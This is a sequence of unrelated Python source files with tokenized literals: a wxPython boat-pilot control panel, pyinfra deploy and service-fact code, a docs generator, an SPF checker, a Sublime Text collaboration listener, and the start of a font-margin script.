SetSizerAndFit ( self . sizer ) <EOL> self . header = wx . 
StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . lblHeading = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblHeading , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . CENTER | wx . ALIGN_CENTER_HORIZONTAL | wx . ALL , <NUM_LIT:2> ) <EOL> self . heading = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT> , maxValue = <NUM_LIT> , style = wx . SL_HORIZONTAL ) <EOL> self . heading . Bind ( wx . EVT_SCROLL , self . on_heading_scroll ) <EOL> self . sizer . Add ( self . heading , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnCentreRudder = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnCentreRudder . Bind ( wx . EVT_BUTTON , self . zero_heading ) <EOL> self . sizer . Add ( self . btnCentreRudder , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . lblThrottle = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblThrottle , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . CENTER | wx . ALIGN_CENTER_VERTICAL | wx . ALIGN_RIGHT | wx . ALL , <NUM_LIT:2> ) <EOL> self . speed = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT:100> , maxValue = <NUM_LIT:100> , style = wx . SL_VERTICAL ) <EOL> self . speed . Bind ( wx . EVT_SCROLL , self . on_speed_scroll ) <EOL> self . sizer . Add ( self . speed , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnZeroThrottle = wx . 
Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnZeroThrottle . Bind ( wx . EVT_BUTTON , self . zero_speed ) <EOL> self . sizer . Add ( self . btnZeroThrottle , ( <NUM_LIT:7> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnAuto = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnAuto . Bind ( wx . EVT_BUTTON , self . engage ) <EOL> self . sizer . Add ( self . btnAuto , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . btnHalt = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnHalt . Bind ( wx . EVT_BUTTON , self . halt ) <EOL> self . sizer . Add ( self . btnHalt , ( <NUM_LIT:10> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def engage ( self , event ) : <EOL> self . controller . set_auto_pilot_mode ( ) <EOL> self . send_update ( ) <EOL> def halt ( self , event ) : <EOL> self . speed . SetValue ( <NUM_LIT:0.0> ) <EOL> self . heading . SetValue ( <NUM_LIT:0.0> ) <EOL> self . lblThrottle . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . lblHeading . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . controller . halt ( ) <EOL> def zero_speed ( self , event ) : <EOL> self . speed . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def zero_heading ( self , event ) : <EOL> self . heading . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def on_speed_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def on_heading_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def send_update ( self ) : <EOL> sp = self . speed . GetValue ( ) * - <NUM_LIT:1.0> <EOL> he = self . heading . GetValue ( ) <EOL> self . lblThrottle . SetLabel ( str ( sp ) ) <EOL> self . lblHeading . SetLabel ( str ( he ) ) <EOL> self . controller . set_navigation ( sp , he ) <EOL> class ManualPilotPanel ( wx . 
Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:4> , hgap = <NUM_LIT:4> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . lblHeading = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblHeading , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . CENTER | wx . ALIGN_CENTER_HORIZONTAL | wx . ALL , <NUM_LIT:2> ) <EOL> self . steering = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT> , maxValue = <NUM_LIT> , style = wx . SL_HORIZONTAL ) <EOL> self . steering . Bind ( wx . EVT_SCROLL , self . on_steering_scroll ) <EOL> self . sizer . Add ( self . steering , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnCentreRudder = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnCentreRudder . Bind ( wx . EVT_BUTTON , self . centre_rudder ) <EOL> self . sizer . Add ( self . btnCentreRudder , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . lblThrottle = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . lblThrottle , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . CENTER | wx . ALIGN_CENTER_VERTICAL | wx . ALIGN_RIGHT | wx . ALL , <NUM_LIT:2> ) <EOL> self . throttle = wx . Slider ( self , value = <NUM_LIT:0> , minValue = - <NUM_LIT:100> , maxValue = <NUM_LIT:100> , style = wx . 
SL_VERTICAL ) <EOL> self . throttle . Bind ( wx . EVT_SCROLL , self . on_throttle_scroll ) <EOL> self . sizer . Add ( self . throttle , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnZeroThrottle = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnZeroThrottle . Bind ( wx . EVT_BUTTON , self . zero_throttle ) <EOL> self . sizer . Add ( self . btnZeroThrottle , ( <NUM_LIT:7> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) , wx . ALIGN_CENTER | wx . ALL , <NUM_LIT:2> ) <EOL> self . btnManual = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnManual . Bind ( wx . EVT_BUTTON , self . engage ) <EOL> self . sizer . Add ( self . btnManual , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . btnHalt = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . btnHalt . Bind ( wx . EVT_BUTTON , self . halt ) <EOL> self . sizer . Add ( self . btnHalt , ( <NUM_LIT:10> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . ALL , <NUM_LIT:2> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def engage ( self , event ) : <EOL> self . controller . set_manual_mode ( ) <EOL> self . send_update ( ) <EOL> def halt ( self , event ) : <EOL> self . throttle . SetValue ( <NUM_LIT:0.0> ) <EOL> self . steering . SetValue ( <NUM_LIT:0.0> ) <EOL> self . lblThrottle . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . lblHeading . SetLabel ( <NUM_LIT:0.0> ) <EOL> self . controller . halt ( ) <EOL> def zero_throttle ( self , event ) : <EOL> self . throttle . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def centre_rudder ( self , event ) : <EOL> self . steering . SetValue ( <NUM_LIT:0.0> ) <EOL> self . send_update ( ) <EOL> def on_throttle_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def on_steering_scroll ( self , event ) : <EOL> self . send_update ( ) <EOL> def send_update ( self ) : <EOL> th = self . 
throttle . GetValue ( ) * - <NUM_LIT:1.0> <EOL> st = self . steering . GetValue ( ) <EOL> self . lblThrottle . SetLabel ( str ( th ) ) <EOL> self . lblHeading . SetLabel ( str ( st ) ) <EOL> self . controller . set_drive ( th , st ) </s>
# Example pyinfra deploy script: build an inventory, connect, queue four
# operations, run them, then dump one fact as JSON.

# gevent monkey-patching must happen before anything else is imported so
# that pyinfra's SSH connections run cooperatively.
from gevent import monkey
monkey.patch_all()

import json
import logging

from pyinfra.api import Inventory, Config, State
from pyinfra.api.operation import add_op
from pyinfra.api.operations import run_ops
from pyinfra.api.ssh import connect_all
from pyinfra.api.facts import get_facts
from pyinfra.modules import server, files

# Quieten everything except the named logger.
logging.basicConfig(level=logging.WARNING)
logging.getLogger('<STR_LIT>').setLevel(logging.INFO)

# Inventory: a default host list plus named "bsd" and "centos" groups.
# A host can be a plain name or a (name, data_dict) tuple of per-host data;
# each group is a (hosts, group_data) tuple.
inventory = Inventory(
    ([
        '<STR_LIT>',
        ('<STR_LIT>', {'<STR_LIT>': True}),
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>'
    ], {}),
    bsd=([
        '<STR_LIT>'
    ], {
        '<STR_LIT>': '<STR_LIT>'
    }),
    centos=([
        '<STR_LIT>',
        '<STR_LIT>'
    ], {}),
    ssh_user='<STR_LIT>',
    ssh_key='<STR_LIT>'
)

# Deploy-wide settings: failure threshold percentage and timeout.
config = Config(
    FAIL_PERCENT=<NUM_LIT:50>,
    TIMEOUT=<NUM_LIT:1>
)

# Build the deploy state and open SSH connections to every host up front.
state = State(inventory, config)
connect_all(state)

# Queue operations; nothing executes until run_ops below.
add_op(
    state, server.user,
    '<STR_LIT>',
    home='<STR_LIT>',
    shell='<STR_LIT>',
    sudo=True
)

add_op(
    state, files.file,
    '<STR_LIT>',
    user='<STR_LIT>',
    group='<STR_LIT>',
    mode='<STR_LIT>',
    sudo=True
)

add_op(
    state, files.directory,
    '<STR_LIT>',
    user='<STR_LIT>',
    group='<STR_LIT>',
    mode='<STR_LIT>',
    sudo=True
)

add_op(
    state, files.put,
    '<STR_LIT>',
    '<STR_LIT>'
)

# Execute everything queued above against all connected hosts.
run_ops(state)

# Gather one fact from every host and pretty-print the result.
facts = get_facts(state, '<STR_LIT>')
print(json.dumps(facts, indent=<NUM_LIT:4>))
<s> import re <EOL> from pyinfra . api import FactBase <EOL> class UpstartStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) == '<STR_LIT>' <EOL> return services <EOL> class SystemdStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) == '<STR_LIT>' <EOL> return services <EOL> class SystemdEnabled ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '<STR_LIT>' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = matches . group ( <NUM_LIT:2> ) in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return services <EOL> class InitdStatus ( FactBase ) : <EOL> '''<STR_LIT>''' <EOL> command = '''<STR_LIT>''' <EOL> _regex = r'<STR_LIT>' <EOL> def process ( self , output ) : <EOL> services = { } <EOL> for line in output : <EOL> matches = re . match ( self . _regex , line ) <EOL> if matches : <EOL> status = int ( matches . group ( <NUM_LIT:2> ) ) <EOL> if status == <NUM_LIT:0> : <EOL> status = True <EOL> elif status < <NUM_LIT:4> : <EOL> status = False <EOL> else : <EOL> status = None <EOL> services [ matches . group ( <NUM_LIT:1> ) ] = status <EOL> return services <EOL> class RcdStatus ( InitdStatus ) : <EOL> '''<STR_LIT>''' <EOL> command = '''<STR_LIT>''' <EOL> class RcdEnabled ( FactBase ) : <EOL> '''<STR_LIT>''' </s>
<s> import re <EOL> from types import FunctionType <EOL> from importlib import import_module <EOL> from inspect import getmembers , getargspec <EOL> from pyinfra import modules <EOL> def _title_line ( char , string ) : <EOL> return '<STR_LIT>' . join ( char for _ in xrange ( <NUM_LIT:0> , len ( string ) ) ) <EOL> def _format_doc_line ( line ) : <EOL> line = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , line ) <EOL> return line [ <NUM_LIT:4> : ] <EOL> def build_facts ( ) : <EOL> for module_name in modules . __all__ : <EOL> lines = [ ] <EOL> print '<STR_LIT>' . format ( module_name ) <EOL> module = import_module ( '<STR_LIT>' . format ( module_name ) ) <EOL> lines . append ( module_name . title ( ) ) <EOL> lines . append ( _title_line ( '<STR_LIT:->' , module_name ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> if module . __doc__ : <EOL> lines . append ( module . __doc__ ) <EOL> operation_functions = [ <EOL> ( key , value . _pyinfra_op ) <EOL> for key , value in getmembers ( module ) <EOL> if ( <EOL> isinstance ( value , FunctionType ) <EOL> and value . __module__ == module . __name__ <EOL> and getattr ( value , '<STR_LIT>' , False ) <EOL> and not value . __name__ . startswith ( '<STR_LIT:_>' ) <EOL> ) <EOL> ] <EOL> for name , func in operation_functions : <EOL> title_name = '<STR_LIT>' . format ( module_name , name ) <EOL> lines . append ( title_name ) <EOL> lines . append ( _title_line ( '<STR_LIT>' , title_name ) ) <EOL> doc = func . __doc__ <EOL> if doc : <EOL> docbits = doc . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> description_lines = [ ] <EOL> for line in docbits : <EOL> if line : <EOL> description_lines . append ( line ) <EOL> else : <EOL> break <EOL> if len ( docbits ) > <NUM_LIT:0> : <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . extend ( [ line . strip ( ) for line in description_lines ] ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> doc = '<STR_LIT:\n>' . 
join ( docbits [ len ( description_lines ) : ] ) <EOL> argspec = getargspec ( func ) <EOL> arg_defaults = [ <EOL> "<STR_LIT>" . format ( arg ) if isinstance ( arg , str ) else arg <EOL> for arg in argspec . defaults <EOL> ] if argspec . defaults else None <EOL> defaults = dict ( zip ( <EOL> argspec . args [ - len ( arg_defaults ) : ] , <EOL> arg_defaults <EOL> ) ) if arg_defaults else { } <EOL> args = [ <EOL> '<STR_LIT>' . format ( arg , defaults [ arg ] ) <EOL> if arg in defaults else arg <EOL> for arg in argspec . args [ <NUM_LIT:2> : ] <EOL> ] <EOL> arg_count = len ( args ) <EOL> if arg_count < <NUM_LIT:7> : <EOL> args_string = '<STR_LIT:U+002CU+0020>' . join ( args ) <EOL> else : <EOL> top_args = args [ : arg_count / <NUM_LIT:2> ] <EOL> bottom_args = args [ arg_count / <NUM_LIT:2> : ] <EOL> args_string = '''<STR_LIT>''' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( top_args ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( bottom_args ) <EOL> ) <EOL> lines . append ( '''<STR_LIT>''' . strip ( ) . format ( module_name , name , args_string ) ) <EOL> if doc : <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' . format ( '<STR_LIT:\n>' . join ( [ <EOL> _format_doc_line ( line ) for line in doc . split ( '<STR_LIT:\n>' ) <EOL> ] ) ) . strip ( ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> module_filename = '<STR_LIT>' . format ( module_name ) <EOL> print '<STR_LIT>' . format ( module_filename ) <EOL> out = '<STR_LIT:\n>' . join ( lines ) <EOL> outfile = open ( module_filename , '<STR_LIT:w>' ) <EOL> outfile . write ( out ) <EOL> outfile . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print '<STR_LIT>' <EOL> build_facts ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import spf <EOL> import sys <EOL> def main ( ) : <EOL> if len ( sys . argv ) != <NUM_LIT:4> : <EOL> print ( '<STR_LIT:[>' + os . path . basename ( __file__ ) + '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:64> ) <EOL> result , explanation = spf . check2 ( sys . argv [ <NUM_LIT:1> ] , sys . argv [ <NUM_LIT:2> ] , sys . argv [ <NUM_LIT:3> ] ) <EOL> print ( '<STR_LIT:[>' + os . path . basename ( __file__ ) + '<STR_LIT>' + result + '<STR_LIT:U+002CU+0020>' + explanation + '<STR_LIT:)>' ) <EOL> if result == '<STR_LIT>' : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:11> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
import os
import time
import hashlib
import collections

import sublime_plugin

# Support both package-relative and flat import layouts (Sublime Text 2 vs 3
# load plugins differently).
try:
    from .common import msg, shared as G, utils
    from .sublime_utils import get_buf, get_text
    assert G and G and utils and msg and get_buf and get_text
except ImportError:
    from common import msg, shared as G, utils
    from sublime_utils import get_buf, get_text


def if_connected(f):
    # Decorator: skip the handler entirely unless the shared agent exists and
    # is ready; otherwise append the agent as the handler's last argument.
    def wrapped(*args):
        if not G.AGENT or not G.AGENT.is_ready():
            return
        args = list(args)
        args.append(G.AGENT)
        return f(*args)
    return wrapped


def is_view_loaded(view):
    """<STR_LIT>"""
    # Returns the shared buffer dict for `view` only when the agent exists,
    # a workspace is joined, the view has finished loading, and the buffer
    # has its content field populated; otherwise returns None implicitly.
    if not G.AGENT:
        return
    if not G.AGENT.joined_workspace:
        return
    if view.is_loading():
        return
    buf = get_buf(view)
    if not buf or buf.get('<STR_LIT>') is None:
        return
    return buf


class Listener(sublime_plugin.EventListener):
    # Bridges Sublime Text editor events to the shared collaboration agent:
    # buffer edits, saves, renames, deletes and selection changes are turned
    # into agent messages.

    def __init__(self, *args, **kwargs):
        sublime_plugin.EventListener.__init__(self, *args, **kwargs)
        # Buffer ids whose last modification matched the known hash — used to
        # flag the following selection event as a highlight.
        self._highlights = set()
        # Per-buffer {selection, time} to rate-limit duplicate selection events.
        self._view_selections = {}
        # Per-buffer [pending_save_count, last_relative_path] between
        # on_pre_save and on_post_save.
        self.between_save_events = collections.defaultdict(lambda: [<NUM_LIT:0>, '<STR_LIT>'])
        self.disable_follow_mode_timeout = None

    @if_connected
    def on_post_window_command(self, window, command, *args, **kwargs):
        agent = args[-<NUM_LIT:1>]
        # First command: files were removed — notify the agent for every
        # shared buffer whose file no longer exists on disk.
        if command == '<STR_LIT>':
            files = args[<NUM_LIT:0>]['<STR_LIT>']
            for f in files:
                buf = agent.get_buf_by_path(f)
                if not buf:
                    continue
                if os.path.exists(f):
                    continue
                agent.send({
                    '<STR_LIT:name>': '<STR_LIT>',
                    '<STR_LIT:id>': buf['<STR_LIT:id>'],
                })
            return
        # Second command: directories were removed — notify for every shared
        # buffer whose workspace-relative path lives under a removed dir.
        if command == '<STR_LIT>':
            dirs = args[<NUM_LIT:0>]['<STR_LIT>']
            for d in dirs:
                if os.path.isdir(d):
                    continue
                rel_path = utils.to_rel_path(d)
                if not rel_path:
                    msg.error('<STR_LIT>', d)
                    continue
                for buf_id, buf in G.AGENT.bufs.items():
                    if buf['<STR_LIT:path>'].startswith(rel_path):
                        agent.send({
                            '<STR_LIT:name>': '<STR_LIT>',
                            '<STR_LIT:id>': buf_id,
                        })

    @if_connected
    def on_window_command(self, window, command, *args, **kwargs):
        if command == '<STR_LIT>':
            msg.debug('<STR_LIT>')
        # When the shared workspace window receives this command, forward a
        # follow-up command to it; failures are logged, not raised.
        if window == G.WORKSPACE_WINDOW and command == '<STR_LIT>':
            msg.log('<STR_LIT>')
            try:
                window.run_command('<STR_LIT>')
            except Exception as e:
                msg.error(e)

    def name(self, view):
        # Human-readable identifier for a view used in debug logging.
        return view.file_name()

    def on_new(self, view):
        msg.debug('<STR_LIT>', self.name(view))

    @if_connected
    def reenable_follow_mode(self, agent):
        # Timer callback: lift the temporary follow-mode suppression.
        agent.temp_disable_follow = False
        self.disable_follow_mode_timeout = None

    @if_connected
    def disable_follow_mode(self, timeout, agent):
        # Temporarily suppress follow mode while the local user is typing;
        # re-arms the re-enable timer on every call.
        if G.FOLLOW_MODE is True:
            agent.temp_disable_follow = True
        utils.cancel_timeout(self.disable_follow_mode_timeout)
        self.disable_follow_mode_timeout = utils.set_timeout(self.reenable_follow_mode, timeout)

    @if_connected
    def on_clone(self, view, agent):
        msg.debug('<STR_LIT>', self.name(view))
        buf = get_buf(view)
        if not buf:
            return
        buf_id = int(buf['<STR_LIT:id>'])
        # Fire (once) any callback the agent registered for this buffer's clone.
        f = agent.on_clone.get(buf_id)
        if not f:
            return
        del agent.on_clone[buf_id]
        f(buf, view)

    @if_connected
    def on_close(self, view, agent):
        msg.debug('<STR_LIT>', self.name(view))

    @if_connected
    def on_load(self, view, agent):
        msg.debug('<STR_LIT>', self.name(view))
        buf = get_buf(view)
        if not buf:
            return
        buf_id = int(buf['<STR_LIT:id>'])
        # Run all deferred callbacks registered for this buffer's load, on the
        # next tick (timeout 0), then forget them.
        d = agent.on_load.get(buf_id)
        if not d:
            return
        del agent.on_load[buf_id]
        utils.set_timeout(lambda: [f() for (_, f) in d.items()], <NUM_LIT:0>)

    @if_connected
    def on_pre_save(self, view, agent):
        if view.is_scratch():
            return
        # Record the buffer's current (relative, if possible) path and bump
        # the pending-save counter; on_post_save pairs with this.
        p = view.name()
        if view.file_name():
            try:
                p = utils.to_rel_path(view.file_name())
            except ValueError:
                p = view.file_name()
        i = self.between_save_events[view.buffer_id()]
        i[<NUM_LIT:0>] += <NUM_LIT:1>
        i[<NUM_LIT:1>] = p

    @if_connected
    def on_post_save(self, view, agent):
        view_buf_id = view.buffer_id()

        def cleanup():
            # Balance the counter incremented in on_pre_save.
            i = self.between_save_events[view_buf_id]
            i[<NUM_LIT:0>] -= <NUM_LIT:1>

        if view.is_scratch():
            return
        i = self.between_save_events[view_buf_id]
        # Saves the agent itself triggered are consumed silently.
        if agent.ignored_saves[view_buf_id] > <NUM_LIT:0>:
            agent.ignored_saves[view_buf_id] -= <NUM_LIT:1>
            return cleanup()
        old_name = i[<NUM_LIT:1>]
        # NOTE(review): the re-read of `i` and `old_name` below duplicates the
        # lines above — kept as-is (doc-only change).
        i = self.between_save_events[view_buf_id]
        # More than one save in flight: let the earlier event handle it.
        if i[<NUM_LIT:0>] > <NUM_LIT:1>:
            return cleanup()
        old_name = i[<NUM_LIT:1>]
        event = None
        buf = get_buf(view)
        try:
            name = utils.to_rel_path(view.file_name())
        except ValueError:
            name = view.file_name()
        is_shared = utils.is_shared(view.file_name())
        if buf is None:
            # Unknown buffer saved inside the shared tree: create it on the
            # agent (unless the path is ignored).
            if not is_shared:
                return cleanup()
            if G.IGNORE and G.IGNORE.is_ignored(view.file_name(), log=True):
                msg.log(view.file_name(), '<STR_LIT>')
                return cleanup()
            msg.log('<STR_LIT>', name, '<STR_LIT:U+0020>', view.file_name())
            event = {
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': get_text(view),
                '<STR_LIT:path>': name
            }
        elif name != old_name:
            if is_shared:
                # Known buffer saved under a new shared path: rename.
                msg.log('<STR_LIT>', old_name, '<STR_LIT>', name)
                event = {
                    '<STR_LIT:name>': '<STR_LIT>',
                    '<STR_LIT:id>': buf['<STR_LIT:id>'],
                    '<STR_LIT:path>': name
                }
            else:
                # Saved outside the shared tree: remove it from the workspace.
                msg.log('<STR_LIT>', name)
                event = {
                    '<STR_LIT:name>': '<STR_LIT>',
                    '<STR_LIT:id>': buf['<STR_LIT:id>'],
                }
        if event:
            agent.send(event)
        if is_shared and buf:
            agent.views_changed.append(('<STR_LIT>', view, buf))
        cleanup()

    @if_connected
    def on_modified(self, view, agent):
        buf = is_view_loaded(view)
        if not buf:
            return
        text = get_text(view)
        # Only utf8 buffers are synced.
        if buf['<STR_LIT>'] != '<STR_LIT:utf8>':
            return msg.warn('<STR_LIT>')
        text = text.encode('<STR_LIT:utf-8>')
        view_md5 = hashlib.md5(text).hexdigest()
        bid = view.buffer_id()
        buf['<STR_LIT>'] = False
        # Content unchanged (hash matches): this "modification" was a
        # highlight-style event — remember it for on_selection_modified.
        if view_md5 == G.VIEW_TO_HASH.get(bid):
            self._highlights.add(bid)
            return
        G.VIEW_TO_HASH[view.buffer_id()] = view_md5
        msg.debug('<STR_LIT>', buf['<STR_LIT:path>'], '<STR_LIT>', buf['<STR_LIT:id>'])
        # Pause follow mode briefly while the local user is editing.
        self.disable_follow_mode(<NUM_LIT>)
        agent.views_changed.append(('<STR_LIT>', view, buf))

    @if_connected
    def on_selection_modified(self, view, agent, buf=None):
        buf = is_view_loaded(view)
        if not buf or '<STR_LIT>' not in G.PERMS:
            return
        c = [[x.a, x.b] for x in view.sel()]
        bid = view.buffer_id()
        previous = self._view_selections.get(bid, {})
        now = time.time()
        # Rate-limit: drop an identical selection reported within 1 second.
        if previous.get("<STR_LIT>") == c:
            t = previous.get("<STR_LIT:time>", <NUM_LIT:0>)
            if now - t < <NUM_LIT:1>:
                return
        previous['<STR_LIT:time>'] = now
        previous['<STR_LIT>'] = c
        self._view_selections[bid] = previous
        # A pending highlight flag (set by on_modified) is consumed here.
        discard = bid in self._highlights
        if discard:
            self._highlights.discard(bid)
        if agent.joined_workspace:
            agent.send({
                '<STR_LIT:id>': buf['<STR_LIT:id>'],
                '<STR_LIT:name>': '<STR_LIT>',
                '<STR_LIT>': c,
                '<STR_LIT>': False,
                '<STR_LIT>': False,
                '<STR_LIT>': discard,
            })

    @if_connected
    def on_activated(self, view, agent):
        buf = get_buf(view)
        if buf:
            msg.debug('<STR_LIT>', buf['<STR_LIT:path>'], '<STR_LIT>', buf['<STR_LIT:id>'])
            # Re-sync content and selection when a shared view gains focus.
            self.on_modified(view)
            self.on_selection_modified(view)
<s> from vanilla import * <EOL> from defconAppKit . windows . baseWindow import BaseWindowController <EOL> from AppKit import * <EOL> import os . path <EOL> def sortFonts ( fonts ) : <EOL> """<STR_LIT>""" <EOL> return fonts <EOL> """<STR_LIT>""" <EOL> def addMargins ( f , gnames = [ ] , leftUnits = <NUM_LIT:0> , rightUnits = <NUM_LIT:0> , adjustComponents = True ) : <EOL> for gname in gnames : <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> g . prepareUndo ( '<STR_LIT>' ) <EOL> if leftUnits != <NUM_LIT:0> : <EOL> if g . box : <EOL> g . leftMargin += leftUnits <EOL> else : <EOL> g . width += leftUnits <EOL> if adjustComponents : <EOL> for comp in g . components : <EOL> if comp . baseGlyph in gnames : <EOL> comp . offset = ( comp . offset [ <NUM_LIT:0> ] - leftUnits , comp . offset [ <NUM_LIT:1> ] ) <EOL> if rightUnits != <NUM_LIT:0> : <EOL> if g . box : <EOL> g . rightMargin += rightUnits <EOL> else : <EOL> g . width += rightUnits <EOL> g . performUndo ( ) <EOL> def multiplyMargins ( f , gnames , leftMultiplier = <NUM_LIT:1> , rightMultiplier = <NUM_LIT:1> , roundValues = <NUM_LIT:1> , adjustComponents = True ) : <EOL> marginRecords = { } <EOL> for gname in gnames : <EOL> leftUnits , rightUnits = <NUM_LIT:0> , <NUM_LIT:0> <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> if leftMultiplier != <NUM_LIT:1> : <EOL> leftUnits = ( leftMultiplier * g . leftMargin ) - g . leftMargin <EOL> if rightMultiplier != <NUM_LIT:1> : <EOL> rightUnits = ( rightMultiplier * g . rightMargin ) - g 